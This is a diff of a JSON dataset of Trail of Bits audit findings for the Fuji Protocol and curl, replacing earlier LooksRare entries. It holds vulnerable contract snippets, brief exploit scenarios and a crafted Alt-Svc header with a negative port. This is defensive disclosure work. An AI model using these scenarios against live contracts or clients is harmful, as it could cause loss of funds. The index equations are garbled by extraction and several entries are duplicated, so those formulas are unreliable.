causing isContract to return false. Even though the order was signed by an ERC1271-compatible contract, the verify method will attempt to validate the signers address as though it were signed by an EOA. Recommendations Short term, clearly document for developers that SignatureChecker.verify is not guaranteed to accurately distinguish between an EOA and a contract signer, and emphasize that it should never be used in a manner that requires such a guarantee. Long term, avoid adding or altering functionality that would rely on a guarantee that a signatures source remains consistent over time.", + "title": "8. Errors in the white papers equation for index calculation ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FujiProtocol.pdf", + "body": "The white paper uses the following equation (equation 1) to describe how the index for a given token at timestamp is calculated: = 1 + ( 1 )/ 1 is the amount of the given token that the Fuji Protocol owes the provider (the borrowing protocol) at timestamp . The index is updated only when the balance changes through the accrual of interest, not when the balance changes through borrowing or repayment operations. This means that is always negative, which is incorrect, as should calculate the )/ ( 1 1 1 interest rate since the last index update. * 3 * 2 * ... * . A user's current balance is computed by taking the users initial stored The index represents the total interest rate since the deployment of the protocol. It is the product of the various interest rates accrued on the active providers during the lifetime of the protocol (measured only during state-changing interactions with the provider): 1 balance, multiplying it by the current index, and dividing it by the index at the time of the creation of that user's position. The division operation ensures that the user will not owe interest that accrued before the creation of the users position. The index provides an ecient way to keep track of interest rates without having to update each user's balance separately, which would be prohibitively expensive on Ethereum. However, interest is compounded through multiplication, not addition. The formula should use the product sign instead of the plus sign. 27 Fuji Protocol Exploit Scenario Alice decides to use the Fuji Protocol after reading the white paper. She later learns that calculations in the white paper do not match the implementations in the protocol. Because Alice allocated her funds based on her understanding of the specication, she loses funds. Recommendations Short term, replace equation 1 in the white paper with a correct and simplied version. For more information on the simplied version, see nding TOB-FUJI-015. = 1 / * 1 Long term, ensure that the equations in the white paper are correct and in sync with the implementation. 28 Fuji Protocol", "labels": [ "Trail of Bits", - "Severity: Informational", + "Severity: Medium", "Difficulty: Undetermined" ] }, { - "title": "12. tokenId and amount fully controlled by the order strategy when matching two orders ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/LooksRare.pdf", - "body": "When two orders are matched, the strategy dened by the MakerOrder is called to check whether the order can be executed. function matchAskWithTakerBidUsingETHAndWETH ( OrderTypes.TakerOrder calldata takerBid, OrderTypes.MakerOrder calldata makerAsk ) external payable override nonReentrant { [...] // Retrieve execution parameters ( bool isExecutionValid , uint256 tokenId , uint256 amount ) = IExecutionStrategy(makerAsk.strategy) .canExecuteTakerBid(takerBid, makerAsk); require (isExecutionValid, \"Strategy: Execution invalid\" ); [...] } Figure 12.1: matchAskWithTakerBidUsingETHAndWETH ( LooksRareExchange.sol#186-212 ) The strategy call returns a boolean indicating whether the order match can be executed, the tokenId to be sold, and the amount to be transferred. The LooksRareExchange contract does not verify these last two values, which means that the strategy has full control over them. function matchAskWithTakerBidUsingETHAndWETH ( OrderTypes.TakerOrder calldata takerBid, OrderTypes.MakerOrder calldata makerAsk ) external payable override nonReentrant { [...] // Execution part 1/2 _transferFeesAndFundsWithWETH( makerAsk.strategy, makerAsk.collection, tokenId, makerAsk.signer, takerBid.price, makerAsk.minPercentageToAsk ); // Execution part 2/2 _transferNonFungibleToken(makerAsk.collection, makerAsk.signer, takerBid.taker, tokenId, amount); emit TakerBid( askHash, makerAsk.nonce, takerBid.taker, makerAsk.signer, makerAsk.strategy, makerAsk.currency, makerAsk.collection, tokenId, amount, takerBid.price ); } Figure 12.2: matchAskWithTakerBidUsingETHAndWETH ( LooksRareExchange.sol#217-228 ) This ultimately means that a faulty or malicious strategy can cause a loss of funds (e.g., by returning a dierent tokenId from the one that was intended to be sold or bought). Additionally, this issue may become problematic if strategies become trustless and are no longer developed or allowlisted by the LooksRare team. Exploit Scenario A faulty strategy, which returns a dierent tokenId than expected, is allowlisted in the protocol. Alice creates a new order using that strategy to sell one of her tokens. Bob matches Alices order, but because the tokenId is not validated before executing the order, he gets a dierent token than he intended to buy. Recommendations Short term, evaluate and document this behavior and use this documentation when integrating new strategies into the protocol. Long term, consider adding further safeguards to the LooksRareExchange contract to check the validity of the tokenId and the amount returned by the call to the strategy.", + "title": "9. FujiERC1155.setURI does not adhere to the EIP-1155 specication ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FujiProtocol.pdf", + "body": "The FujiERC1155 contracts setURI function does not emit the URI event. /** * @dev Sets a new URI for all token types, by relying on the token type ID */ function setURI(string memory _newUri) public onlyOwner { _uri = _newUri; } Figure 9.1: FujiERC1155.sol#L266-268 This behavior does not adhere to the EIP-1155 specication, which states the following: Changes to the URI MUST emit the URI event if the change can be expressed with an event (i.e. it isnt dynamic/programmatic). Figure 9.2: A snippet of the EIP-1155 specication Recommendations Short term, revise the setURI function so that it emits the URI event. Long term, review the EIP-1155 specication to verify that the contracts adhere to the standard. References EIP-1155 29 Fuji Protocol", "labels": [ "Trail of Bits", - "Severity: Medium", - "Difficulty: High" + "Severity: Informational", + "Difficulty: Undetermined" ] }, { - "title": "13. Risk of phishing due to data stored in maker order params eld ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/LooksRare.pdf", - "body": "The MakerOrder struct contains a params eld, which holds arbitrary data for each strategy. This storage of data may increase the chance that users could be phished. struct MakerOrder { bool isOrderAsk; // true --> ask / false --> bid address signer; // signer of the maker order address collection; // collection address uint256 price; // price (used as ) uint256 tokenId; // id of the token uint256 amount; // amount of tokens to sell/purchase (must be 1 for ERC721, 1+ for ERC1155) address strategy; // strategy for trade execution (e.g., DutchAuction, StandardSaleForFixedPrice) address currency; // currency (e.g., WETH) uint256 nonce; // order nonce (must be unique unless new maker order is meant to override existing one e.g., lower ask price) uint256 startTime; // startTime in timestamp uint256 endTime; // endTime in timestamp uint256 minPercentageToAsk; // slippage protection (9000 --> 90% of the final price must return to ask) bytes params; // additional parameters uint8 v; // v: parameter (27 or 28) bytes32 r; // r: parameter bytes32 s; // s: parameter } Figure 13.1: The MakerOrder struct in contracts/libraries/OrderTypes.sol#L12-29 In the Dutch auction strategy, the maker params eld denes the start price for the auction. When a user generates the signature, the UI must specify the purpose of params . function canExecuteTakerBid (OrderTypes.TakerOrder calldata takerBid, OrderTypes.MakerOrder calldata makerAsk) external view override returns ( bool , uint256 , uint256 ) { } uint256 startPrice = abi.decode(makerAsk.params, ( uint256 )); uint256 endPrice = makerAsk.price; Figure 13.2: The canExecuteTakerBid function in contracts/executionStrategies/StrategyDutchAuction.sol#L39-L70 When used in a StrategyPrivateSale transaction, the params eld holds the buyer address that the private sale is intended for. function canExecuteTakerBid(OrderTypes.TakerOrder calldata takerBid, OrderTypes.MakerOrder calldata makerAsk) external view override returns ( bool , uint256 , uint256 ) { // Retrieve target buyer address targetBuyer = abi.decode(makerAsk.params, ( address )); return ( ((targetBuyer == takerBid.taker) && (makerAsk.price == takerBid.price) && (makerAsk.tokenId == takerBid.tokenId) && (makerAsk.startTime <= block.timestamp ) && (makerAsk.endTime >= block.timestamp )), makerAsk.tokenId, makerAsk.amount ); } Figure 13.3: The canExecuteTakerBid function in contracts/executionStrategies/StrategyPrivateSale.sol Exploit Scenario Alice receives an EIP-712 signature request through MetaMask. Because the value is masked in the params eld, Alice accidentally signs an incorrect parameter that allows an attacker to match. Recommendations Short term, document the expected values for the params value for all strategies and add in-code documentation to ensure that developers are aware of strategy expectations. Long term, document the risks associated with o-chain signatures and always ensure that users are aware of the risks of signing arbitrary data.", + "title": "10. Partial renancing operations can break the protocol ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FujiProtocol.pdf", + "body": "The white paper documents the Controller contracts ability to perform partial renancing operations. These operations move only a fraction of debt and collateral from one provider to another to prevent unprotable interest rate slippage. However, the protocol does not correctly support partial renancing situations in which debt and collateral are spread across multiple providers. For example, payback and withdrawal operations always interact with the current provider, which might not contain enough funds to execute these operations. Additionally, the interest rate indexes are computed only from the debt owed to the current provider, which might not accurately reect the interest rate across all providers. Exploit Scenario An executor performs a partial renancing operation. Interest rates are computed incorrectly, resulting in a loss of funds for either the users or the protocol. Recommendations Short term, disable partial renancing until the protocol supports it in all situations. Long term, ensure that functionality that is not fully supported by the protocol cannot be used by accident. 30 Fuji Protocol", "labels": [ "Trail of Bits", "Severity: Medium", - "Difficulty: Low" + "Difficulty: Medium" ] }, { - "title": "14. Use of legacy openssl version in solidity-coverage plugin ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/LooksRare.pdf", - "body": "The LooksRare codebase uses a version of solidity-coverage that relies on a legacy version of openssl to run. While this plugin does not alter protocol contracts deployed to production, the use of outdated security protocols anywhere in the codebase may be risky or prone to errors. Error in plugin solidity-coverage: Error: error:0308010C:digital envelope routines::unsupported Figure 14.1: Error raised by npx hardhat coverage Recommendations Short term, refactor the code to use a new version of openssl to prevent the exploitation of openssl vulnerabilities. Long term, avoid using outdated or legacy versions of dependencies.", + "title": "11. Native support for ether increases the codebases complexity ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FujiProtocol.pdf", + "body": "The protocol supports ERC20 tokens and Ethereums native currency, ether. Ether transfers follow dierent semantics than token transfers. As a result, many functions contain extra code, like the code shown in gure 11.1, to handle ether transfers. if (vAssets.borrowAsset == ETH) { require(msg.value >= amountToPayback, Errors.VL_AMOUNT_ERROR); if (msg.value > amountToPayback) { IERC20Upgradeable(vAssets.borrowAsset).univTransfer( payable(msg.sender), msg.value - amountToPayback ); } } else { // Check User Allowance require( IERC20Upgradeable(vAssets.borrowAsset).allowance(msg.sender, address(this)) >= amountToPayback, Errors.VL_MISSING_ERC20_ALLOWANCE ); Figure 11.1: FujiVault.sol#L319-333 This extra code increases the codebases complexity. Furthermore, functions will behave dierently depending on their arguments. Recommendations Short term, replace native support for ether with support for ERC20 WETH. This will decrease the complexity of the protocol and the likelihood of bugs. 31 Fuji Protocol", "labels": [ "Trail of Bits", "Severity: Informational", - "Difficulty: High" + "Difficulty: Undetermined" ] }, { - "title": "15. TypeScript compiler errors during deployment ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/LooksRare.pdf", - "body": "TypeScript throws an error while trying to compile scripts during the deployment process. scripts/helpers/deploy-exchange.ts:29:5 - error TS7053: Element implicitly has an 'any' type because expression of type 'string' can't be used to index type '{ mainnet: string; rinkeby: string; localhost: string; }'. No index signature with a parameter of type 'string' was found on type '{ mainnet: string; rinkeby: string; localhost: string; }'. 29 config.Fee.Standard[activeNetwork] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Figure 15.1: TypeScript error raised by npx hardhat run --network localhost scripts/hardhat/deploy-hardhat.ts In the config.ts le, the config object does not explicitly allow string types to be used as an index type for accessing its keys. Hardhat assigns a string type as the value of activeNetwork . As a result, TypeScript throws a compiler error when it tries to access a member of the config object using the activeNetwork value. Recommendations Short term, add type information to the config object that allows its keys to be accessed using string types. Long term, ensure that TypeScript can compile properly without errors in any and every potential context.", + "title": "12. Missing events for critical operations ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FujiProtocol.pdf", + "body": "Many functions that make important state changes do not emit events. These functions include, but are not limited to, the following: All setters in the FujiAdmin contract The setFujiAdmin, setFujiERC1155, setFactor, setOracle, and setProviders functions in the FujiVault contract The setMapping and setURI functions in the FujiMapping contract The setFujiAdmin and setExecutors functions in the Controller contract The setURI and setPermit functions in the FujiERC1155 contract The setPriceFeed function in the FujiOracle contract Exploit scenario An attacker gains permission to execute an operation that changes critical protocol parameters. She executes the operation, which does not emit an event. Neither the Fuji Protocol team nor the users are notied about the parameter change. The attacker uses the changed parameter to steal funds. Later, the attack is detected due to the missing funds, but it is too late to react and mitigate the attack. Recommendations Short term, ensure that all state-changing operations emit events. Long term, use an event monitoring system like Tenderly or Defender, use Defenders automated incident response feature, and develop an incident response plan to follow in case of an emergency. 32 Fuji Protocol 13. Indexes are not updated before all operations that require up-to-date indexes Severity: High Diculty: Low Type: Undened Behavior Finding ID: TOB-FUJI-013 Target: FujiVault.sol, FujiERC1155.sol, FLiquidator.sol", + "labels": [ + "Trail of Bits", + "Severity: Low", + "Difficulty: Low" + ] + }, + { + "title": "14. No protection against missing index updates before operations that depend on up-to-date indexes ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FujiProtocol.pdf", + "body": "The FujiERC1155 contract uses indexes to keep track of interest rates. Refer to Appendix F for more detail on the index calculation. The FujiVault contracts updateF1155Balances function is responsible for updating indexes. This function must be called before all operations that read indexes (TOB-FUJI-013). However, the protocol does not protect against situations in which indexes are not updated before they are read; these situations could result in incorrect accounting. Exploit Scenario Developer Bob adds a new operation that reads indexes, but he forgets to add a call to updateF1155Balances. As a result, the new operation uses outdated index values, which causes incorrect accounting. Recommendations Short term, redesign the index calculations so that they provide protection against the reading of outdated indexes. For example, the index calculation process could keep track of the last index updates block number and access indexes exclusively through a getter, which updates the index automatically, if it has not already been updated for the current block. Since ERC-1155s balanceOf and totalSupply functions do not allow side eects, this solution would require the use of dierent functions internally. Long term, use defensive coding practices to ensure that critical operations are always executed when required. 34 Fuji Protocol", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: Low" + ] + }, + { + "title": "15. Formula for index calculation is unnecessarily complex ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FujiProtocol.pdf", + "body": "Indexes are updated within the FujiERC1155 contracts updateState function, shown in gure 15.1. Refer to Appendix F for more detail on the index calculation. function updateState(uint256 _assetID, uint256 newBalance) external override onlyPermit { uint256 total = totalSupply(_assetID); if (newBalance > 0 && total > 0 && newBalance > total) { uint256 diff = newBalance - total; uint256 amountToIndexRatio = (diff.wadToRay()).rayDiv(total.wadToRay()); uint256 result = amountToIndexRatio + WadRayMath.ray(); result = result.rayMul(indexes[_assetID]); require(result <= type(uint128).max, Errors.VL_INDEX_OVERFLOW); indexes[_assetID] = uint128(result); // TODO: calculate interest rate for a fujiOptimizer Fee. } } Figure 15.1: FujiERC1155.sol#L40-57 The code in gure 14.1 translates to the following equation: = 1 * (1 + ( )/ 1 ) 1 Using the distributive property, we can transform this equation into the following: = 1 / * (1 + 1 This version can then be simplied: / 1 ) 1 = 1 / * (1 + 1 1) 35 Fuji Protocol Finally, we can simplify the equation even further: = 1 / * 1 The resulting equation is simpler and more intuitively conveys the underlying ideathat the index grows by the same ratio as the balance grew since the last index update. Recommendations Short term, use the simpler index calculation formula in the updateState function of the Fuji1155Contract. This will result in code that is more intuitive and that executes using slightly less gas. Long term, use simpler versions of the equations used by the protocol to make the arithmetic easier to understand and implement correctly. 36 Fuji Protocol 16. Flashers initiateFlashloan function does not revert on invalid ashnum values Severity: Low Diculty: High Type: Data Validation Finding ID: TOB-FUJI-016 Target: Flasher.sol", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: Undetermined" + ] + }, + { + "title": "17. Docstrings do not reect functions implementations ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FujiProtocol.pdf", + "body": "The docstring of the FujiVault contracts withdraw function states the following: * @param _withdrawAmount: amount of collateral to withdraw * otherwise pass -1 to withdraw maximum amount possible of collateral (including safety factors) Figure 17.1: FujiVault.sol#L188-189 However, the maximum amount is withdrawn on any negative value, not only on a value of -1. A similar inconsistency between the docstring and the implementation exists in the FujiVault contracts payback function. Recommendations Short term, adjust the withdraw and payback functions docstrings or their implementations to make them match. Long term, ensure that docstrings always match the corresponding functions implementation. 38 Fuji Protocol", + "labels": [ + "Trail of Bits", + "Severity: Low", + "Difficulty: Undetermined" + ] + }, + { + "title": "18. Harvesters getHarvestTransaction function does not revert on invalid _farmProtocolNum and harvestType values ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FujiProtocol.pdf", + "body": "The Harvester contracts getHarvestTransaction function incorrectly returns claimedToken and transaction values of 0 if the _farmProtocolNum parameter is set to a value greater than 1 or if the harvestType value is set to value greater than 2. However, the function does not revert on invalid _farmProtocolNum and harvestType values. function getHarvestTransaction(uint256 _farmProtocolNum, bytes memory _data) external view override returns (address claimedToken, Transaction memory transaction) { if (_farmProtocolNum == 0) { transaction.to = 0x3d9819210A31b4961b30EF54bE2aeD79B9c9Cd3B; transaction.data = abi.encodeWithSelector( bytes4(keccak256(\"claimComp(address)\")), msg.sender ); claimedToken = 0xc00e94Cb662C3520282E6f5717214004A7f26888; } else if (_farmProtocolNum == 1) { uint256 harvestType = abi.decode(_data, (uint256)); if (harvestType == 0) { // claim (, address[] memory assets) = abi.decode(_data, (uint256, address[])); transaction.to = 0xd784927Ff2f95ba542BfC824c8a8a98F3495f6b5; transaction.data = abi.encodeWithSelector( bytes4(keccak256(\"claimRewards(address[],uint256,address)\")), assets, type(uint256).max, msg.sender ); } else if (harvestType == 1) { // transaction.to = 0x4da27a545c0c5B758a6BA100e3a049001de870f5; transaction.data = abi.encodeWithSelector(bytes4(keccak256(\"cooldown()\"))); } else if (harvestType == 2) { // transaction.to = 0x4da27a545c0c5B758a6BA100e3a049001de870f5; 39 Fuji Protocol transaction.data = abi.encodeWithSelector( bytes4(keccak256(\"redeem(address,uint256)\")), msg.sender, type(uint256).max ); claimedToken = 0x7Fc66500c84A76Ad7e9c93437bFc5Ac33E2DDaE9; } } } Figure 18.1: Harvester.sol#L13-54 Exploit Scenario Alice, an executor of the Fuji Protocol, calls getHarvestTransaction with the _farmProtocolNum parameter set to 2. As a result, rather than reverting, the function returns claimedToken and transaction values of 0. Recommendations Short term, revise getHarvestTransaction so that it reverts if it is called with invalid farmProtocolNum or harvestType values. Long term, ensure that all functions revert if they are called with invalid values. 40 Fuji Protocol", + "labels": [ + "Trail of Bits", + "Severity: Low", + "Difficulty: Medium" + ] + }, + { + "title": "19. Lack of data validation in Controllers doRenancing function ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FujiProtocol.pdf", + "body": "The Controller contracts doRefinancing function does not check the _newProvider value. Therefore, the function accepts invalid values for the _newProvider parameter. function doRefinancing( address _vaultAddr, address _newProvider, uint256 _ratioA, uint256 _ratioB, uint8 _flashNum ) external isValidVault(_vaultAddr) onlyOwnerOrExecutor { IVault vault = IVault(_vaultAddr); [...] [...] IVault(_vaultAddr).setActiveProvider(_newProvider); } Figure 19.1: Controller.sol#L44-84 Exploit Scenario Alice, an executor of the Fuji Protocol, calls Controller.doRefinancing with the _newProvider parameter set to the same address as the active provider. As a result, unnecessary ash loan fees will be paid. Recommendations Short term, revise the doRefinancing function so that it reverts if _newProvider is set to the same address as the active provider. Long term, ensure that all functions revert if they are called with invalid values. 41 Fuji Protocol", + "labels": [ + "Trail of Bits", + "Severity: Low", + "Difficulty: High" + ] + }, + { + "title": "20. Lack of data validation on function parameters ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FujiProtocol.pdf", + "body": "Certain setter functions fail to validate the addresses they receive as input. The following addresses are not validated: The addresses passed to all setters in the FujiAdmin contract The _newFujiAdmin address in the setFujiAdmin function in the Controller and FujiVault contracts The _provider address in the FujiVault.setActiveProvider function The _oracle address in the FujiVault.setOracle function The _providers addresses in the FujiVault.setProviders function The newOwner address in the transferOwnership function in the Claimable and ClaimableUpgradeable contracts Exploit scenario Alice, a member of the Fuji Protocol team, invokes the FujiVault.setOracle function and sets the oracle address as address(0). As a result, code relying on the oracle address is no longer functional. Recommendations Short term, add zero-value or contract existence checks to the functions listed above to ensure that users cannot accidentally set incorrect values, misconguring the protocol. Long term, use Slither, which will catch missing zero checks. 42 Fuji Protocol", + "labels": [ + "Trail of Bits", + "Severity: Low", + "Difficulty: Low" + ] + }, + { + "title": "12. Missing events for critical operations ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FujiProtocol.pdf", + "body": "Many functions that make important state changes do not emit events. These functions include, but are not limited to, the following: All setters in the FujiAdmin contract The setFujiAdmin, setFujiERC1155, setFactor, setOracle, and setProviders functions in the FujiVault contract The setMapping and setURI functions in the FujiMapping contract The setFujiAdmin and setExecutors functions in the Controller contract The setURI and setPermit functions in the FujiERC1155 contract The setPriceFeed function in the FujiOracle contract Exploit scenario An attacker gains permission to execute an operation that changes critical protocol parameters. She executes the operation, which does not emit an event. Neither the Fuji Protocol team nor the users are notied about the parameter change. The attacker uses the changed parameter to steal funds. Later, the attack is detected due to the missing funds, but it is too late to react and mitigate the attack. Recommendations Short term, ensure that all state-changing operations emit events. Long term, use an event monitoring system like Tenderly or Defender, use Defenders automated incident response feature, and develop an incident response plan to follow in case of an emergency. 32 Fuji Protocol", + "labels": [ + "Trail of Bits", + "Severity: Low", + "Difficulty: Low" + ] + }, + { + "title": "13. Indexes are not updated before all operations that require up-to-date indexes ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FujiProtocol.pdf", + "body": "The FujiERC1155 contract uses indexes to keep track of interest rates. Refer to Appendix F for more detail on the index calculation. The FujiVault contracts updateF1155Balances function is responsible for updating indexes. However, this function is not called before all operations that read indexes. As a result, these operations use outdated indexes, which results in incorrect accounting and could make the protocol vulnerable to exploits. FujiVault.deposit calls FujiERC1155._mint, which reads indexes but does not call updateF1155Balances. FujiVault.paybackLiq calls FujiERC1155.balanceOf, which reads indexes but does not call updateF1155Balances. Exploit Scenario The indexes have not been updated in one day. User Bob deposits collateral into the FujiVault. Day-old indexes are used to compute Bobs scaled amount, causing Bob to gain interest for an additional day for free. Recommendations Short term, ensure that all operations that require up-to-date indexes rst call updateF1155Balances. Write tests for each function that depends on up-to-date indexes with assertions that fail if indexes are outdated. Long term, redesign the way indexes are accessed and updated such that a developer cannot simply forget to call updateF1155Balances. 33 Fuji Protocol", + "labels": [ + "Trail of Bits", + "Severity: High", + "Difficulty: Low" + ] + }, + { + "title": "15. Formula for index calculation is unnecessarily complex ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FujiProtocol.pdf", + "body": "Indexes are updated within the FujiERC1155 contracts updateState function, shown in gure 15.1. Refer to Appendix F for more detail on the index calculation. function updateState(uint256 _assetID, uint256 newBalance) external override onlyPermit { uint256 total = totalSupply(_assetID); if (newBalance > 0 && total > 0 && newBalance > total) { uint256 diff = newBalance - total; uint256 amountToIndexRatio = (diff.wadToRay()).rayDiv(total.wadToRay()); uint256 result = amountToIndexRatio + WadRayMath.ray(); result = result.rayMul(indexes[_assetID]); require(result <= type(uint128).max, Errors.VL_INDEX_OVERFLOW); indexes[_assetID] = uint128(result); // TODO: calculate interest rate for a fujiOptimizer Fee. } } Figure 15.1: FujiERC1155.sol#L40-57 The code in gure 14.1 translates to the following equation: = 1 * (1 + ( )/ 1 ) 1 Using the distributive property, we can transform this equation into the following: = 1 / * (1 + 1 This version can then be simplied: / 1 ) 1 = 1 / * (1 + 1 1) 35 Fuji Protocol Finally, we can simplify the equation even further: = 1 / * 1 The resulting equation is simpler and more intuitively conveys the underlying ideathat the index grows by the same ratio as the balance grew since the last index update. Recommendations Short term, use the simpler index calculation formula in the updateState function of the Fuji1155Contract. This will result in code that is more intuitive and that executes using slightly less gas. Long term, use simpler versions of the equations used by the protocol to make the arithmetic easier to understand and implement correctly. 36 Fuji Protocol", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: Undetermined" + ] + }, + { + "title": "16. Flashers initiateFlashloan function does not revert on invalid ashnum values ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FujiProtocol.pdf", + "body": "The Flasher contracts initiateFlashloan function does not initiate a ash loan or perform a renancing operation if the flashnum parameter is set to a value greater than 2. However, the function does not revert on invalid flashnum values. function initiateFlashloan(FlashLoan.Info calldata info, uint8 _flashnum) external isAuthorized { if (_flashnum == 0) { _initiateAaveFlashLoan(info); } else if (_flashnum == 1) { _initiateDyDxFlashLoan(info); } else if (_flashnum == 2) { _initiateCreamFlashLoan(info); } } Figure 16.1: Flasher.sol#L61-69 Exploit Scenario Alice, an executor of the Fuji Protocol, calls Controller. doRefinancing with the flashnum parameter set to 3. As a result, no ash loan is initialized, and no renancing happens; only the active provider is changed. This results in unexpected behavior. For example, if a user wants to repay his debt after renancing, the operation will fail, as no debt is owed to the active provider. Recommendations Short term, revise initiateFlashloan so that it reverts when it is called with an invalid flashnum value. Long term, ensure that all functions revert if they are called with invalid values. 37 Fuji Protocol", + "labels": [ + "Trail of Bits", + "Severity: Low", + "Difficulty: High" + ] + }, + { + "title": "21. Solidity compiler optimizations can be problematic ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FujiProtocol.pdf", + "body": "Fuji Protocol has enabled optional compiler optimizations in Solidity. There have been several optimization bugs with security implications. Moreover, optimizations are actively being developed. Solidity compiler optimizations are disabled by default, and it is unclear how many contracts in the wild actually use them. Therefore, it is unclear how well they are being tested and exercised. High-severity security issues due to optimization bugs have occurred in the past. A high-severity bug in the emscripten-generated solc-js compiler used by True and Remix persisted until late 2018. The x for this bug was not reported in the Solidity CHANGELOG. Another high-severity optimization bug resulting in incorrect bit shift results was patched in Solidity 0.5.6. More recently, another bug due to the incorrect caching of keccak256 was reported. A compiler audit of Solidity from November 2018 concluded that the optional optimizations may not be safe. It is likely that there are latent bugs related to optimization and that new bugs will be introduced due to future optimizations. Exploit Scenario A latent or future bug in Solidity compiler optimizationsor in the Emscripten transpilation to solc-jscauses a security vulnerability in the Fuji Protocol contracts. Recommendations Short term, measure the gas savings from optimizations and carefully weigh them against the possibility of an optimization-related bug. Long term, monitor the development and adoption of Solidity compiler optimizations to assess their maturity. 43 Fuji Protocol A. Vulnerability Categories The following tables describe the vulnerability categories, severity levels, and diculty levels used in this document. Vulnerability Categories Category", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: High" + ] + }, + { + "title": "1. Bad recommendation in libcurl cookie documentation ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-12-curl-securityreview.pdf", + "body": "The libcurl documentation recommends that, to enable the cookie store with a blank cookie database, the calling application should use the CURLOPT_COOKIEFILE option with a non-existing le name or plain , as shown in gure 1.1. However, the former recommendationa non-blank lename with a target that does not existcan have unexpected results if a le by that name is unexpectedly present. Figure 1.1: The recommendation in libcurls documentation Exploit Scenario An inexperienced developer uses libcurl in his application, invoking the CURLOPT_COOKIEFILE option and hard-coding a lename that he thinks will never exist (e.g., a long random string), but which could potentially be created on the lesystem. An attacker reverse-engineers his program to determine the lename and path in question, and then uses a separate local le write vulnerability to inject cookies into the application. Recommendations Short term, remove the reference to a non-existing le name; mention only a blank string. Long term, avoid suggesting tricks such as this in documentation when a misuse or misunderstanding of them could result in side eects of which users may be unaware.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: High" + ] + }, + { + "title": "2. Libcurl URI parser accepts invalid characters ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-12-curl-securityreview.pdf", + "body": "According to RFC 3986 section 2.2, Reserved Characters, reserved = gen-delims / sub-delims gen-delims = \":\" / \"/\" / \"?\" / \"#\" / \"[\" / \"]\" / \"@\" sub-delims = \"!\" / \"$\" / \"&\" / \"'\" / \"(\" / \")\" / \"*\" / \"+\" / \",\" / \";\" / \"=\" Figure 2.1: Reserved characters for URIs. Furthermore, the host eld of the URI is dened as follows: host = IP-literal / IPv4address / reg-name reg-name = *( unreserved / pct-encoded / sub-delims ) ... unreserved = ALPHA / DIGIT / \"-\" / \".\" / \"_\" / \"~\" sub-delims = \"!\" / \"$\" / \"&\" / \"'\" / \"(\" / \")\" / \"*\" / \"+\" / \",\" / \";\" / \"=\" Figure 2.2: Valid characters for the URI host eld However, cURL does not seem to strictly adhere to this format, as it accepts characters not included in the above. This behavior is present in both libcurl and the cURL binary. For instance, characters from the gen-delims set, and those not in the reg-name set, are accepted: $ curl -g \"http://foo[]bar\" # from gen-delims curl: (6) Could not resolve host: foo[]bar $ curl -g \"http://foo{}bar\" # outside of reg-name curl: (6) Could not resolve host: foo{}bar Figure 2.3: Valid characters for the URI host eld The exploitability and impact of this issue is not yet well understood; this may be deliberate behavior to account for currently unknown edge-cases or legacy support. Recommendations Short term, determine whether these characters are being allowed for compatibility reasons. If so, it is likely that nothing can be done; if not, however, make the URI parser stricter, rejecting characters that cannot appear in a valid URI as dened by RFC 3986. Long term, add fuzz tests for the URI parser that use forbidden or out-of-scope characters.", + "labels": [ + "Trail of Bits", + "Severity: Undetermined", + "Difficulty: Low" + ] + }, + { + "title": "3. libcurl Alt-Svc parser accepts invalid port numbers ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-12-curl-securityreview.pdf", + "body": "Invalid port numbers in Alt-Svc headers, such as negative numbers, may be accepted by libcurl when presented by an HTTP server. libcurl uses the strtoul function to parse port numbers in Alt-Svc headers. This function will accept and parse negative numbers and represent them as unsigned integers without indicating an error. For example, when an HTTP server provides an invalid port number of -18446744073709543616, cURL parses the number as 8000: * Using HTTP2, server supports multiplexing * Connection state changed (HTTP/2 confirmed) * Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=0 * Using Stream ID: 1 (easy handle 0x12d013600) > GET / HTTP/2 > Host: localhost:2443 > user-agent: curl/7.79.1 > accept: */* > < HTTP/2 200 < server: basic-h2-server/1.0 < content-length: 130 < content-type: application/json * Added alt-svc: localhost: 8000 over h3 < alt-svc: h3=\": -18446744073709543616 \" < Figure 3.1: Example cURL session Exploit Scenario A server operator wishes to target cURL clients and serve them alternative content. The operator includes a specially-crafted, invalid Alt-Svc header on the HTTP server responses, indicating that HTTP/3 is available on port -18446744073709543616 , an invalid, negative port number. When users connect to the HTTP server using standards-compliant HTTP client software, their clients ignore the invalid header. However, when users connect using cURL, it interprets the negative number as an unsigned integer and uses the resulting port number, 8000 , to upgrade the next connection to HTTP/3. The server operator hosts alternative content on this other port. Recommendations Short term, improve parsing and validation of Alt-Svc headers so that invalid port values are rejected. Long term, add fuzz and dierential tests to the Alt-Svc parsing code to detect non-standard behavior.", + "labels": [ + "Trail of Bits", + "Severity: Undetermined", + "Difficulty: Low" + ] + }, + { + "title": "4. Non-constant-time comparison of secrets ", + "html_url": 